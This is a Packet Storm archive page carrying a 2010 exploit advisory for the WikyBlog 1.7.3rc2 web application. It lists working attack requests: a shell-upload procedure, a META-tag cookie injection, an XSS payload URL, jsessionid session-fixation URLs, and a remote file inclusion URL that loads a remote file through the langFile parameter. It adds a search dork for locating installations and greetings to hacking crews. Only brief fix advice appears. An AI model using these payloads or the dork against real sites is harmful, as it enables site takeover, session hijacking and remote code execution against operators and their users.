what you don't know can hurt you

WikyBlog 1.7.3rc2 XSS / Shell Upload / RFI

WikyBlog 1.7.3rc2 XSS / Shell Upload / RFI
Posted Feb 25, 2010
Authored by indoushka

WikyBlog version 1.7.3rc2 suffers from shell upload, cross site scripting, cookie manipulation, session fixation, and remote file inclusion vulnerabilities.

tags | exploit, remote, shell, vulnerability, code execution, xss, file inclusion
MD5 | 3dde7809ab7fd5d926ab77cbf305ac16

WikyBlog 1.7.3rc2 XSS / Shell Upload / RFI

Change Mirror Download
========================================================================================                  
| # Title : WikyBlog-1.7.3rc2 Mullti Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : www.iq-ty.com
| # Web Site : http://www.wikyblog.com/
| # Dork : Powered by WikyBlog
| # Tested on: windows SP2 Fran├žais V.(Pnx2 2.0) + Lunix Fran├žais v.(9.4 Ubuntu)
| # Bug : XSS
====================== Exploit By indoushka =================================
# Exploit :

1- Upload Shell:

first Register in to web site http://127.0.0.1/Wiky/index.php/Attach/(your name)?cmd=uploadform (use temper data)

secend go to http://127.0.0.1/Wiky/userfiles/(your name )/uploaded/ 2 find you Ev!l

2- Cookie manipulation:

Vulnerability description:

This script is vulnerable to Cookie manipulation attacks.

By injecting a custom HTTP header or by injecting a META tag, it is possible to alter the cookies stored in the browser. Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site.
This vulnerability affects /Wiky/index.php/Special/Main/Templates.
The impact of this vulnerability
By exploiting this vulnerability, an attacker may conduct a session fixation attack. In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server, thereby eliminating the need to obtain the user's session ID afterwards.

Attack details :
The GET variable which has been set to <meta+http-equiv='Set-cookie'+content='userCmd=edit'>.

GET /Wiky/index.php/Special/Main/Templates?cmd=copy&which=<meta+http-equiv='Set-cookie'+content='userCmd=edit'>

How to fix this vulnerability:
You need to filter the output in order to prevent the injection of custom HTTP headers or META tags. Additionally, with each login the application should provide a new session ID to the user.

3- Cross Site Scripting:

http://127.0.0.1/Wiky/index.php/Special/Main/Templates?cmd=copy&which=<img+src=http://127.0.0.1/HomeComputer.jpg+onload=alert(213771818860)>

4- jsessionid session fixation:

Vulnerability description:

This script is vulnerable to jsessionid session fixation attacks.

By injecting a custom jsessionid is possible to alter the session cookie. Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site.
This vulnerability affects /Wiky/index.php/Main.
The impact of this vulnerability
By exploiting this vulnerability, an attacker may conduct a session fixation attack. In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server, thereby eliminating the need to obtain the user's session ID afterwards.

Attack details:

http://127.0.0.1/Wiky/index.php/Comment/Main/;jsessionid=indoushkasessionfixation

http://127.0.0.1/Wiky/index.php/Comment/Main/Home_Wiky/;jsessionid=indoushkasessionfixation

http://127.0.0.1/Wiky/index.php/Edit/Main/;jsessionid=indoushkasessionfixation

5- RFI:

http://localhost/Wiky/include/WBmap.php?langFile=http://localhost/c.txt?


Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * Xproratix ==========================================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (Tinjah.com) * Yashar (sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com)
www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r IntRue (avengers team)
www.hacker.ps * no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net
www.alkrsan.net * www.kadmiwe.net * www.arhack.net
--------------------------------------------------------------------------------------------------------------

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

June 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    1 Files
  • 2
    Jun 2nd
    2 Files
  • 3
    Jun 3rd
    19 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    15 Files
  • 6
    Jun 6th
    12 Files
  • 7
    Jun 7th
    11 Files
  • 8
    Jun 8th
    1 Files
  • 9
    Jun 9th
    1 Files
  • 10
    Jun 10th
    15 Files
  • 11
    Jun 11th
    15 Files
  • 12
    Jun 12th
    15 Files
  • 13
    Jun 13th
    8 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close